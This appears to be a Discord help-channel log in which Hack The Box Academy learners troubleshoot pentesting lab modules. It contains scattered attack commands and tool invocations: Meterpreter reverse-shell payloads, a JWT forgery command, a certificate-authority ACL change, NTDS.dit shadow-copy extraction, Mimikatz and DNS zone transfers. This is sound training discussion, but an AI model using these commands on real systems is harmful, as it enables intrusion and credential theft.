And running multi/handler on local msf, I am getting : The "stdapi" extension is not supported by this Meterpreter type (x64/linux) . I tried both meterpreter_reverse_tcp and meterpreter/reverse_tcp. The syntax of the msfvenom is correct, and on the handler, I have set the payload the same. It makes a connection but doesn't allow for command executions.
so just wondering but whats the difference between the cbbh and cpts exams?
hii can anyone help my friend recover her Instagram account??
hahahahahhah
Nope we're not tech support, go contact instagram support
Would love some help with: https://academy.hackthebox.com/module/158/section/1428 . i cant get a Meterpreter session for some reason, getting "Failed to load extension: The "stdapi" extension is not supported by this Meterpreter type (x64/linux)" . I tried a bunch of different payloads, all are getting the same error. Tried linux/x64/meterpreter/reverse_tcp , linux/x64/meterpreter_reverse_tcp , linux/x64/meterpreter_reverse_https , all are getting the same error
Hi! Quick question:
If I upgrade my subscription to Gold right now, will I immediately receive the 500 cubes, or will they only be credited after my next billing cycle starts?
As long as a subscription is active, you cannot take out another subscription
CBBH: https://academy.hackthebox.com/preview/certifications/htb-certified-bug-bounty-hunter
CPTS: https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist
Also, if I buy a Gold subscription, unlock a module using the 500 cubes, and then cancel the subscription afterward, will I still have permanent access to that module?
Thanks!
Also modules you complete with the access based subscription are reviewable too and cubes you unlock for completing them are yours to use on whatever you like
So you could build up your cubes with access based then use them for the higher tier modules
hey is anyone able to help me with Footprinting module, section MySQL, question 2. The email for the answer i have isnt showing up as correct. even if i check the walkthrough the same answer shows up as incorrect?
Same for me
I'm having 504 gateway timeout
might explain why my answer wasnt submitting haha
Where should we submit the ticket?
I guess we wait
yep
Alright, back to the grind!
Is it me or the pwnbox and the targets are having issues, lag, connectivity issues, freezes?
robots.txtx
What?
Anyone available for a hint on AD attacks & Enumeration skill assessment 2?
Depending on where you're at you'll hate this 
Welcome1
Hi, I am doing skills assessment regarding NTLM relay attacks and I am stuck on question 3. I got the hash of the machine from question 2, tried to coerce the sqlbox but no success. But I am lost what to do next to access SQL machine. Any direction is welcome
I'd use that account to enumerate shares.
Bummer
Would like some help on NoSQL injection SA 2, is anyone available?
guys, I'm doing info gathering web edition and on skill assessment, I was asked to crawl and submit the found mail, but the crawling showed ntg but index.html
Then dig deeper, subdomains, subdomains of subdomains
Can anyone help me with module 57 section 491. Have the username and password for both users yet I cannot log in to the ftp service to get the glad
Flag*. It isn’t connecting and this is driving me up the wall
I can feel it
i've got a new sub sub domain
but all it has is countless random order indes-1-1000
it's best to say the module and section name instead of the numbers
prolly, and I tried dir busting the new sub.sub.domain and no leads
are you using the spider tool given by the module?
yea it's currently running
it's taking a long time, is that it?
I'll try to restart and run this again if it's the way cuz I'm w8ng since 15 mins
Login brute forcing Medusa web services
I’ve been trying to ssh in and ftp in using the usernames and passwords that I acquired and nothing is working
I’m getting a constant “connection refused”
Construct a valid SSL 3.0 padding of the plaintext bytes "AABBCCDDEEFF". Use the byte 00 for any byte that can be an arbitrary value. Provide the padded plaintext without spaces. Assume the cipher suite TLS_RSA_WITH_AES_128_CBC_SHA is used.
If there are 6 bytes in the string, would it mean there needs to be 10 bytes of padding? so 00000000000000000A, so why doesn't this answer work ?
Hi everyone hope you are doing well, ive one question! currently im doing attacking authentication module and currently on jwt algorithm confusion attack. im doing the same steps like mentioned but its throwing error. any help will be appreciated. python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTc0NTg1ODI5MX0.<SNIP> ASIYNejb12GEuZjhVNZ0oyqgqUbVOtipqdiiZyZ02A7Zl24rOxiZCkD-iudtSSccWBKFZrzLwWHIegYAbmc1-qleXZ1UOGU4hDXq4iucdZfxnXQnlIFHZc7V0PMlUtjtvuecppcCyYQMlCJ-TYyU6dslJoiMsk7O0ITdMvUmMwtztukKfXvXZ6bUX4ZZsFYh1eRgb20l04LAMLWyVFsVEYOa-CH5eyFb5lqgZRoOGSeL-D--mecWVJkwGY4ogx8XSh2RVxkT1SlkdTZ6cQ4wns94zEpjAO4xvgk0-0jAgk1ME8-VfFAfgWEK6WIJXbI8dgBZSa14WqSyBj9nyFek9w<SNIP>
Dann
What type of files do Android Runtime and Dalvik VM execute?
guys whats the answer for this question
@everyone
Don't tag everyone....
Hey I need a little help in bash scripting. So the module gave me this asks me to: Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.
And my solution is this:
#!/bin/bash
var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"
for i in {1..40}
do
    var=$(echo $var | base64)
    if [[ "$var" == "$value" && ${#var} -gt 113450 ]]; then
        echo "Last 20 character: ${var: -20}"
        exit 0
    fi
done
but the answer isn't right. (NVM SOLVED IT)
Do not click that link. It’s fake
i need a mod
yeah I know
Why do you need a mod?
I meant for the guy
okay
Thanks 🙏
Anyone know how to fix this?
can you give more context
You're given an ip:port yeah?
In order to ssh in you need to specify the port
Ftp is running internally on that container
also make sure that on that port there is an ssh service
If I'm recalling the exercise correctly: there's an ssh service running on that port that you connect to to then attack the internal ftp service
Would like help on Blind SQL inj module, anyone?
Been stuck here too, how did you manage this ?
Keep getting this error no matter the payload
Any one have any success with question 2 of the Android Emulators section of Android Fundamentals?
hi team
https://academy.hackthebox.com/module/112/section/1067
for the SMB part of Footprinting, i'm not able to get the version of the SMB server. it says to submit the entire banner but whatever i submit it's not taking. i've done all the other questions on the module but for some reason it's not accepting my answer for the version
hmm
Without giving it away I believe the format is <suite> <daemon> <version>
<samba> <daemon> <x.x.x>
i submitted that as the answer and it won't accept it
You can dm me the answer that they won't accept, I'll compare it against mine
I've identified a vulnerability in one of the modules that requires "make" to compile. In the case of this particular module, the "make" command is not available on the target. Does anyone know of a method similar to gcc --static that would allow me to compile the exploit on the attackbox and still execute it on the target?
Any one have any success with question 2 of the skill assessment section of Android Fundamentals?
Would like some help on AD attacks & enum skill assessment 2.
I'm at the final stage of the assessment, just need a little push
File Upload Attacks -Blacklist Filters module target instance wont spawn
Ofc right after I send the message it wants to work
Disregard lol
Does anyone know why cyberchef's url encode produces different output from burp's ctrl+u url encode ?
It's not different, burpsuite encodes spaces as +, cyberchef uses %20 instead
No, cyberchef considers all punctuation points special characters, like ( ) \ etc
Ye, didn't notice that first, I usually do encoding in custom scripts using safeurl encoding
Then again when i try to hex decode it gets only half part correct
Hey everyone. What is a good channel for the questions regarding active boxes?
hi for the last question of the Web Server Pivoting with Rpivot section of Pivoting, Tunneling, and Port Forwarding module I got the connection to the server so now it can't load the web page to get the flag. it says "page not found" or whatever. can someone help me? I'm following the instructions exactly
I got the connection to the pivot box
but the target server on the remote network won't connect for some reason
What proxychains are you running?
I tried the private IPs ending in 129 and 135
and it does nothing either way
You can DM your command if you'd like.
ok I will DM you
hi if I run a server on 0.0.0.0 is that an issue if that's the IP the instructions use?
or do I use the IP of my attack box?
0.0.0.0 is a wildcard for all interfaces
then why are instructions saying to use that?
¯\_(ツ)_/¯
Thats just what 0.0.0.0 does
@gray yacht is helping me with this particular section when he gets home in 30 or less now
so I'm gonna wait for him
I'll get it working
I'm sure I'm generally doing the section right
its probably an issue with the section this time and not my fault
but we'll see what the issue turns out to be. I'm fairly confident this will be resolved by the end of the day.
So I'm not worried. Anyway, I think I'm starting to get it a little more when it comes to the section
I got the flag
section completed. I knew I was gonna have it finished by the end of the day.
Hi, I am doing the Pentest in a nutshell module and im stuck on a question if someone can help, its in the windows system enumeration section, its the question that says what OS version does winpeas report, however the systeminfo.exe is access denied and all the versions ive tried are the wrong answer? can someone point me in the right direction.
In password attacks AD module, I created a shadow volume but it seems not to contain the dit. My user is a domain admin. anyone able to point me in the right direction, because for whatever reason it seems like I don't have writers here. Contents of shadow copy set ID: {6170bacc-f91b-4daf-8a41-0315f21f9cb9}
Contained 1 shadow copies at creation time: 4/28/2025 3:15:22 PM
Shadow Copy ID: {cae793b6-cd5c-43fd-b859-aa85df4d53db}
Original Volume: (C:)\\?\Volume{da2aad9f-e76b-4d77-a2ee-d53dd4c3c8a1}
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: ILF-DC01.ILF.local
Service Machine: ILF-DC01.ILF.local
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
hi friends.
https://academy.hackthebox.com/module/112/section/1069
for the DNS section for Footprinting, it's not giving me the TXT record? i don't think. the command i'm using is
dig axfr <domain> @<target_IP>
i have also tried
dig any <domain> @<target_IP>
Which Module and Section? Have you executed your shadow copy with diskshadow?
try the zone transfer using the FQDN
i tried that as well and it doesn't give me anything
the command used
dig axrp <FQDN> @<target_IP>
axrp ?
the FQDN used is the one given on the first question
i also did dig any
fqdn @ target
I don't know what axrp is did you mean axfr ?
sorry yes axfr
try all the subdomains you find 👀
thank you got it ❤️
how long does it usually take for the wordlist in the same module to give me the answer?
i'm brute forcing with the same wordlist in SecLists
dnsenum --dnsserver <target_IP> --enum -p 0 -s 0 -o subdomains.txt -f <list_here> <FQDN>
okay so i did it with all of the subdomains but i wasn't able to get the final answer
subdomains of subdomains
also; a more fierce list
i tried everything i could find and there's only 1 that lets me do it
and that doesn't give me the .203 thing
i think?
i used the same one in the module
use a different one
unless i should be using something else?
this is the hint
think more about the word than the amount of words in the list

i'm not sure i follow. i tried the combined list. bitquark's list. deepmagic's list. the subdomains-top1million 5000 20000 and 110000 list
there's a wordlist with the word i hinted in it's name
i aint that smart man
😉
I have an extremely basic question that feels dumb, which is I'm on the Windows CLI module and specifically in User and Group management and I can't get the commands to work
Every Active Directory command yields:
Get-ADUser : The server has rejected the client credentials.
At line:1 char:1
+ Get-ADUser -Filter *
+ ~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Get-ADUser], AuthenticationException
+ FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.Security.Authentication.AuthenticationException,Microsoft.ActiveDirectory.Management.Commands.GetADUser
Even an initial Import-Module ActiveDirectory ends up with
WARNING: Error initializing default drive: 'The server has rejected the client credentials.'.
I don't think this is intended because the solution sheet just says to do Import-Module followed by Get-ADUser. I tried a bunch of things like start-process powershell –verb runAs and searching, but everything I can find online is like "right click and run as administrator on the client computer then connect to that" (and this module neither covers RDP nor does RDP appear to even be functional on this particular box).
The htb-student user is definitely in the Administrators group. And I even tried scuttling and remaking the box.
run the command prompt/powershell as admin
windows and even linux CLI handle things in a specific way; as the user shell you are only permitted to do things within a basic user context, not an administrative context
ActiveDirectoryCmdlet:System.Security.Authentication.AuthenticationException,Microsoft.ActiveDirectory.Management.Commands.GetADUser says auth error so run as admin!
it's why if you want to run around in an administrative context; windows requires the shell to be run as admin
how would i accomplish this via SSH? it's why I tried runAs and some Enter-PSSession stuff
as far as RDP not working, that'd be odd but i don't recall having that permission issue when i was running that module
the problem with stuff like runas; is that it will attempt to run an interactive window shell with the process
... i figured it out and my error was very stupid
the question was very subtly using mtanaka as the user instead of the usual htb-student but i didnt notice because the password was the same as always and every other step was as htb-student. actually using the correct username fixed the issue lol
ah, layer 8
Working on the Final Assessment of the Broken Authentication Module. || I enumerated the users and brute forced the password. I'm having problems brute forcing the 2fa pin. Am I on the right track? ||
If brute force doesn't work, think about other things you can try.
Hi guys,I wanted to try out some modules from cwee and the mobile static analysis course.
Would you guys recommend me buying the platinum or gold sub?
If you just want to try out a few modules, monthly might be better. Can always switch to yearly.
i'm guessing it's becuase it's a service account and not a user account?
dm
ok thanks for the suggestion
wow i'm blind
one other thing, how can I run an admin cmd prompt if I'm not part of any admin group
whoami /priv
I think you have SEImpersonatePrivilege iirc
even with a admin prompt I dont have that priv

maybe the box is setup to where SeTakeOwnershipPrivilege gives me an admin prompt?
is disabled though
I remember seeing a blog saying that even if the priv is disabled, you still have it regardless if it's enabled or disabled
idk though, never verified it

you should be able to own any file with that no?
they cover how to enable them
They're asking how come the account can run powershell as admin
despite not having the obvious admin perms
i think you can limit privileges on local accounts
Windows Local Privilege Escalation if i had to guess from the machine name
yeah i think so
that's above tier 0 so unfortunately @quiet halo you can't post content from modules above tier 0
It should still show I'm part of the local admin group at least, no? if I can run an admin prompt
im not exactly sure how it works but youre not really an admin though it just says that to elevate your privs
i just tested using the Local Security Policy app and a low level user i just made
what does this mean
so it's sort of like app locker where it gives you access to specific things?
who's they
yes its where you can assign privileges to users
the module
@quiet halo Please stop posting content from modules above tier 0.
@quiet halo the last one
that wasnt from the module, it was my own computer
alright
kinda having problems on shells and payloads as eternal blue isnt working for both variants
nvm
we good
Web Attacks {Blind Data Exfiltration}
Not getting the flag even if i did follow the walkthrough (filename & url and my ip is configured correctly)
Anyone know of an easy way to install an older version of PHP in Kali, preferably without having to build from source? working through the type juggling exercises and the PHP versions that come stock with Kali and Pwnbox are too new to work with setting up a debug environment for these exercises
spray
hey guys, while I'm trying to submit the plugin ID for "What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan? " in Vuln assessment - Nessus skill assesment, It's giving me wrong answer
i found only 1 high criticality vulnerability in the report mentioned but, it didn't work out, I ALSO had to try other plugin ID's but nothing worked
also for MODS, "What is the name of the vulnerability with plugin ID 26925 from the Windows authenticated scan? (Case sensitive) " question in the same module should be changed to "Windows basic scan instead of windows authentic scan"
What is the name of the vulnerability with plugin ID 26925 from the Windows authenticated scan? (Case sensitive)
Use google search for the above question you mentioned
are u visiting nessus using localhost or target ip?
target IP
i heard people say that some vulns come in when they ran the scan on their own try it maybe
easiest workaround I found was to just set up an ubuntu 20.04 vm
Hi, Im starting out the penetration tester job path and was wondering how important is the "penetration testing process" to the final CPTS exam? I understand it provides industry experience on how an actual pen test happens IRL regarding laws, assessments and documents but how applicable is it to the final report? am i suppose to produce every single document?
There's a module about how you document your pentest that explains what you are supposed to actually provide in the end. It will be a list of vulnerabilities you found as well as an attack chain that allowed you to compromise the whole system. You can also look into the exam report template already to see what fields you are supposed to fill out
hey guys whats up i have trouble with Skills Assessment - File Upload Attacks. When i start Burpsuite and send the POST request to the Intruder and set all Payloads he doesnt give me anything back. I tried it many times. Can someone help. My steps which i do is 1. Clearing the Payloads 2. Marking the §.jpeg§ 3. Copy the Extensions List 4. Removing the URL ENCODE then starting the attack
I have a question regarding the payment of the subscription...is it possible to include a VAT number in the invoice for tax purposes?
Please reach out to support.
@supple star please read #rules
And how can I do that?
Need to speak to a person? Learn how to reach our support via HTB Labs.
Could use a nudge for Blind SQL SA, cant seem to find it. Tried the cookie fields and the post data on login.php and index.php
Hey group, does anyone know what could cause meterpreter reverse_tcp error "Failed to load extension: The "stdapi" extension is not supported by this Meterpreter type (x64/linux)" . It works fine when i do it from the PWNBOX but when I do it from my VM with VPN i get the error. The parrot and msf are both the same version as the ones in the PWNBOX.
has anyone managed in ADCS attacks module, to exploit esc7 from windows for a question?
(basically how to run this command:
Get-CertificationAuthority LAB-DC.LAB.LOCAL | Get-CertificationAuthorityAcl | Add-CertificationAuthorityAcl -Identity "blwasp" -AccessType Allow -AccessMask "ManageCertificates" | Set-CertificationAuthorityAcl -RestartCA
where it required elevated powershell (which in the section we do not have)
can anyone help me, please, with Nocturnal.htb, what should I do?
manually found tracking id but cant do with sqlmap
Is there a good resource anywhere that explains how this algorithm does padding? TLS_RSA_WITH_AES_128_CBC_SHA you'd think if you had 6 bytes and you padded with 10 it would be the answer
You're in the right place, but I'm not sure if sqlmap is the right tool
Proceeded to the next injection point of the SA and sqlmap doesn't work there either
The module shows you how to exploit the vulnerability
Hello, i am doing the Network Enumeration module where i have to map a company network without getting blocked which i track with the statuspage. Upon checking the page, i have 50 alerts already and i haven't run any enumeration yet. Is this normal?
Sure, on a manual way but also suggest sqlmap to avoid all that fuss, why doesn't it work though?
Sure did on all the other exercises throughout the module and did exploit the fact that it did to avoid doing everything manually
Because automated tools aren't perfect, they have limitations, especially with edge cases.
Hi Guys I have some kind of a technical problem. I am doing Attacking Common Services and I found out that I can't scan their targets from my kali. It shows me that host is down and appears up only using -Pn flag in nmap. More, when doing attacking FTP I guessed the port but I can't connect to the server. I tried out it on their pwnbox and in pwnbox it works fine but not in my kali? What can be the problem?
Do u use a private VPN?
It happened to me also many times so i installed Parrot OS direct and since then no more problems. But many times i had this same issue from the VM and needed to reset the machine and set new VPNs and after a time it was working
and take care which VPN is connected sometime i start the lab_machine instead the academy 😄
No I am sure that this is academy vpn but possibly yes I will kill kali and download parrot os
In the information gathering module, i’m in the skills assessment trying to use go buster for vhost enumeration however it gets like 40% through the wordlist, spits out an error then my network stops working
(Attacking Common Services) Just to point out, providing a resource with a username and password list, but not including the correct password needed for the skill assessment, is honestly crazy 
Hi guys, is Anyone available for a sanity check regarding on MSSQL, Exchange & SCCM skills assessment? I managed to get a reverse shell from DB02. I would like to confirm if I am on the right track. Thanks
don't reveal info for modules above tier 0 @fading olive
also: if a user/account is an administrator, they'd have access to administrative commands.
isn't masking commands sufficient to not be revealing info?
no
since anyone can click on them and reveal it anyway
Yes but doesn't privilege escalation count somehow as a vulnerability? If you're log admin on my system you shouldn't be able to get to any other kind of admin should you?
the administrative group that the account you have is a part of has specific access to certain tools; it's intentional access to those tools
ok ok
Also, I had another question which, I hope, won't reveal too much. In the next part which is AEN > Post-Exploitation Persistence, you're supposed to escalate privileges again and you find yourself being able to run a certain GTFOBin as sudo. This GTFOBin is supposed to be able to grant you a reverse shell as root if done properly as per the doc at http://gtfobins.github.io and I haven't managed to do it and I assume that it's impossible since that's not what the module does either, and I wanted to know how you're supposed to find out that you can't use this method? Trying it and seeing that it doesn't work? Or have I just not done it properly?
Have a general question regarding modules. Since I am newish to python / pip/ pip3 /pipx / python3 -m venv.
when kali is a major version some people use and Kali pip install is externally managed, why is there not a walk through as part of the module that shows how to setup the venv or pipx so we can get a "correct process" to work from in the future when we have the "externally managed" issue? for some reason I can't get my head around the venv vs pipx install process
hello guys i was doing a module from tier 0 and got myself stuck in a simple question can you please help me with that
We can't help you if you don't ask the question
Module - section
Issue
Pentesting in nutshell - windows target- here i was supposed to do a nmap scan of the given target machine, and answer few question and i did but the one question that got me stuck is it asks how many tcp port are open in the given target and as according to the nmap scan there are 9 and on 1 service nmap couldn't detect it really, which makes the answer either 9 or 10 ig but none of that helped me
Did you scan all -p- orts
is this the correct channel to post questions regarding a specific module in the cpts path? #cpts
This is the right channel to ask module related questions; #cpts is for questions regarding the exam/prep rather than the modules
ok thanks. I am having an issue with the oracle tns listener footprinting. I keep getting this error when running odat.py then after this error if I nmap 1521 I get filtered.
I don't see an error here
I tried so should I stop or continue without asking?
Continue without asking
ok thanks
help?
is there a reason why if I hit stop and then did nmap it would filter the port?
Likely too many concurrent requests, filtered doesn't mean blocked btw
ahh ok thanks
hello guys i need help in this question, i have got the backup.vhd file how to access it? Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer. attack password, hard lab
Hello Guys I have a question in Attacking Common Services I discovered FTP username but medusa doesn't want to discover a password from the list provided
no match
what can be the problem?
??
this is attacking ftp section
Have you tried using other password attack tools?
Perhaps?
trying hydra now
no even the hydra doesn't help
am I doing something wrong, clicking spawn target and simply waiting for 20 minutes doesn't feel right. happened the other day and now today
anyway to purge existing spawn?
reload the page and try again possibly the problem is with your connection internet is slow or something but yes their targets are spawning quite slow
but if you are waiting for long can be internet connection problem
https://academy.hackthebox.com/module/163/section/1549
Hi everyone!
Could you please help me with this module? I escalated the privileges of the ilfserveradm user to Administrator. Then I tried to run Mimikatz and execute the privilege::debug command, but I got the error:
"ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061".
I'm not sure what I need to do next…
on linux fundamental module kernel release name . I used uname -r command. in my case kernel release is 6.11+parrot-amd64. I submitted following the format specified in the question but still says incorrect. could anybody help me out?
You need to ssh into the target to get the right info;
Spawn instance != spawn target
okay.Thanks
It worked. Thank you so much
oh, i understood how. i asked myself, i answered myself))
hi I solved the Port Forwarding with Windows Netsh section of Pivoting, Tunneling, and Port Forwarding on my own. I want to talk to someone and see if my way of solving it was the intended way. Who can I talk to and when?
I don't want to spoil the answer if the way I did it was the right way.
There are many ways to forward traffic. If you succeeded, then everything is correct. Even if you did not do it as described.
I'm sorry about the delay. The module is password attacks, and the section is attacking active directory and NTDS.dit
And i used vssadmin.exe to create the shadow, which it says it accomplished, but when i try to access the ntds.dit portion, it says objectnot found.
but the shadow copy is there : Shadow Copy Storage association
For volume: (C:)\?\Volume{da2aad9f-e76b-4d77-a2ee-d53dd4c3c8a1}
Shadow Copy Storage volume: (C:)\?\Volume{da2aad9f-e76b-4d77-a2ee-d53dd4c3c8a1}
Used Shadow Copy Storage space: 3.44 MB (0%)
Allocated Shadow Copy Storage space: 320 MB (1%)
Maximum Shadow Copy Storage space: 2.33 GB (10%)
Meh. I'm giving up on that method. I got it another way, but i'd like to figure out how to do it this way, using the actual utils; seems useful.
Hello. I am stuck on the windows fundamental module. Specifically, I am not able to setup the SMB share properly.
To do a short story, I just created and shared the folder Company Data on the target pc. But when I try to connect to it using smbclient, I get a Timeout error. I tried using both pwnbox and the vpn with a kali VM same result.
Even weirder, When I try to ping the target machine, I do not get a reply.
When I look online for a solution, I just got the famous "just turn off Client Firewall" answer. I don't think this is a good solution so I wonder what is a better way to solve the lab?
Hi Guys! Has anyone done Footprinting? What module is focused on? Is it focused on credentials hunting for rdp ftp and other connecting services?
It’s focused on foot printing common services. It goes through ftp, smtp, pop/imap, smb…. Many others. It is an extremely good module IMO. I highly recommend it
• Linux to Linux: Use rsync over SSH — it’s fast, secure, and robust.
• Windows to Linux: Use WinSCP for manual GUI use, or rsync with cwRsync/pscp for scripts.
Is what I use personally
foot printing means hiding traces of attacks?
No think of it as you're searching through them. You are making a “footprint” basically mapping the service for any ally of attack
It’s glorified looking around with ttp’s
Anyone looking for a hacking duo of sorts? Possibly doing some labs or pro labs👀
A footprint is like identifying where something goes, like a footprint in the snow or mud - you can track it down and see what it may do
You got mod?????
Congrats
That's old news
Dayum fr? I haven’t been in here in a while. Last time I was you were not mod
Yeah Marcie I know what footprint is generally just was interested what it means in the module.
It’s that but for common services
If you have academy do it
It means exactly that, a general idea for what common services have/do and what you find on the service without really attacking it
I.e. anonymous login for ftp isn't really attacking ftp, it's just seeing what's available to anyone with a network connection to the service
hi. i have a file transfer through proxy question. i'm doing RDP and SOCKS Tunneling with SocksOverRDP. i am using openvpn, not pwnbox. once i am inside the internal network, specifically, 172.16.5.19 as victor i am unable to see the files i want to transfer. i initially connected with xfreerdp /drive:tunnel,/home/kali.... option. once i get in the internal machine, i am no longer able to connect to the tscclient, it says the file is empty. when i set up a python3 server on kali to host the files and attempt wget or curl, it says it can't connect to remote server. i realize this is a proxy issue, but i'm a little lost. i tried wget 127.0.0.1:1080 and other things like that. what should i do so i can transfer SocksOverRDP-Server.exe to the internal network?
You need to disable real-time protection
Guys I have questions
Also 127.0.0.1 is gonna be localhost
Marcie prolly has answers
Hhhh so I play ctf of hackthebox collab with bugcrowd
I solve all ctfs but I have the last one I'm not so good at pwn
This isn't #general or a ctf channel
I don't have access to general I can't write there
Read and follow #welcome to access more of the server: but you're not gonna get help for active ctfs
As a general rule: you're only meant to get help from your team/others participating
i did do that. the problem isn't the dll, its that i can't get the files, specifically the executable, transferred to the internal network. are you saying i need to do this within the internal network as well?
No hints are allowed for the duration of the event. Once the event is over, feel free to share solutions.
Yes but I need only exploit of this cve for this cms version I don't find it
Thanks for ignoring what I said
No hints are allowed for the duration of the event. Once the event is over, feel free to share solutions.
Sorry man
Anyway. It's not on topic for this, or any channel :)) unless I missed a memo and there is a channel for it.
Sounds like some network instability issues, maybe, the fact you can't wget though may be something else
Victor is machine 1 yeah?
Iirc this lab is set up;
Attacker -> a -> b -> c
Where a is the 10.129 ip
ok. yes. this is why i was trying localhost, because i began wondering if it was some sort of weird proxy issue. but, nothing worked. continued to say, can't connect to local host, so i was trying to figure out why it couldn't connect to my localhost. victor is the first internal machine, yes.
Because the ip hosting the .exe isn't localhost
It'd be your tun0 ip
yes yes, i know, my point is that i used tun0 and localhost, just in case.
tun0 is what i expected to work, but didn't.
If it's the first machine you connect to: it'll have a connection to your host
Did you specify port, did you run the python server from the same directory the .exe is in
Default python http.server serves it on port 8000
its the first internal machine, so victor:pass@123 to connect to 172.16.5.19
after using mstsc.exe to connect
Then you'll need to do port forwarding if you want to wget; or do some mstsc shenanigans to share files
Iirc it's under advanced options
yes, i tried multiple ports from 80, 8080, 8000 and i always run from the directory the file i need
Port forwarding == telling another (ip) and port to push traffic to another ip and port
ok, that's what i was thinking... perhaps some form of port forwarding maybe, it was not able to connect to my computer. was not sure really what i needed to do.
Not dictating what port a service uses
port forward through ssh?
That's possible with -L iirc
ok, thanks. i found a really bizarre way to solve this machine without using server tools or any further tools from here. i guess that's all that matters, but i still wanted to try these tools because they are new to me.
most people here with some experience will just tell you to use Ligolo-ng instead ¯_(ツ)_/¯
It heavily simplifies a lot of the stuff, and bonus: no dll shenanigans
@solar hedge please don't reveal info from modules above tier 0
Apologies. The only thing I had typed out was direction that was included in the module itself, I had thought only indicating solutions was not allowed. What's the best forum to obtain assistance?
Just state the part you're working on, as the module itself is the walkthrough.
You should be doing it blind tbh, learn how to unstick yourself
Can anyone help me with this plz? Is there any way I can solve this besides turning off the firewall?
can you provide the commands you're using?
I get it and agree, I'm just 99.7% through CPTS after many months and many many hours and have been banging my head against this all day as I'm doing exactly what is done in the module but it's not working properly. Hoping for a small hint to point me in the proper direction.
If resetting the lab doesn't work then idk what to tell you
As a general principle I don't help with that module
Did that a few times as well. Will try a fresh look at it tomorrow perhaps, hopefully I'm overlooking something minor
smbclient '\SERVER_IP\Company Data' -U htb-student.
I will be offline for a little bit so I will catch up when I come back home
Assuming you replaced SERVER_IP With the target IP
hi I solved a section from the Pivoting Tunneling and Port Forwarding module today and I want to make sure I solved it the way its meant to be solved. I checked with @gray yacht but I want to DM one other person to confirm I solved it correctly. Anyone available tonight?
or now?
this is for the Port Forwarding with Netsh section of Pivoting, Tunneling, and Port Forwarding Module that I did earlier today
Let me check if I have notes with it, give me a minute.
Sometimes there are multiple ways to complete the challenges and there isn't really "one way it should be done"
well, can I DM you and you can tell me if I solved it in a way where I learned what I needed to learn?
I agree with that for sure, who knows we could've done it differently, but we can compare 🙂
sure I'll DM you too
👍
ok so I dmed @vernal tapir how about you @cloud urchin can I DM you?
I want to check with a mod possibly. Matthew seems to think I am good.
ok matthew solved it the way I did that's good enough for me
onto the next section then
He is just fine 👍 (I don't think the mods want to be DMed) but I took care of ya 😄 Carry on with your journey sir, be confident in yourself don't second doubt. If you got it right, doesn't matter which way, it's right!
does anyone know the powershell version of this accesschk.exe /accepteula \\.\Pipe\lsass -v
I asked deep seek and it gave me the wrong command
I need help please it is bugging me but where can I find the answer to the first question on Components of a Network that reads "What type of network cable is used to transmit data over long distances with minimal signal loss?" because I thought it would be fiber optic cable but apparently that is incorrect and keeps coming up as such so if someone can point out my mistake or point me in the right direction i would greatly appreciate it.
reminder that mods aren't staff; they may not have done the module themselves
ok thanks
ok got it
thank you for taking care of me. I think that it would be smart for me to do more work tomorrow on the next section. either way, it looks like I am moving more quickly now for whatever reason.
Is there where I'm supposed to ask for help?
for academy modules: yes
you can also utilize the search feature in the upper right to see if someone else asked a similar question and had it answered
Can anyone point me in the right direction in the Payloads and Shells module - Infiltrating Unix/LINUX, I was able to get a TTY UNIX Shell however I've been unable to find the hostname of the router in the devicedetails directory at the root of the file system. Am i right to assume that I need credentials to be able to access this directory since its the root of the file system? I've also tried other solutions as to trying to find a txt file using $type or $find commands however that came to no avail. Can anyone give me any advice?
you are incorrect in assuming this
Can you elaborate please?
also $type and $find aren't commands
$ in linux denotes a variable call
type isn't a linux command either
you don't need credentials if your current user/account can access it, then you can access it
when you get a shell you're dropped in as the service account the service is running under
I may be wrong in assuming that I can't access it then, I only assumed cause i also can't seem to find the directory. I thought it would be easily seen with ls or dir
with find, if you're searching the root of the file system you will need to redirect the error output to /dev/null
as even root will not be able to access certain files
Thank you, I'll try looking a bit more into this and redirect the error output to /dev/null
but the directory should be visible if you ls /
remember the directory you land in when a shell pops isn't going to be the root directory
remember with unix systems, / is the filesystem root
ohhhhhh that makes so much sense
thank you! I just naturally assumed the directory i landed in was automatically the root directory
Yes. and there are two slashes at the start but discord does not show them well....
because discord uses markdown and \ is an escape character
also with smbclient on linux you have to do \\\\ip\\share or //ip/share
Hun?... What does it do?
since in bash, \ is an escape character; so for it to see the \ as \ you need to double up
\\ <- this is 4 \
escape characters "escape" the shell to do meta-functions, you often see new-line as \n <-- the \ isn't interpreted literally, rather it "escapes" the parsing and does whatever n is designed to do
in this case -> new-line (CRLF on windows)
and is why \n is counted as "1 character" because it doesn't count the \ as a character
Wait so when I try to do the lab I need to put 4 \ instead of just 2? why then on the lab they only show 2?
In computing and telecommunications, an escape character is a character that invokes an alternative interpretation on the following characters in a character sequence. An escape character is a particular case of metacharacters. Generally, the judgement of whether something is an escape character or not depends on the context.
In the telecommunic...
there is a difference between \ and /; one is an escape character, the other is not
they are fundamentally, not the same
ah i see the confusion

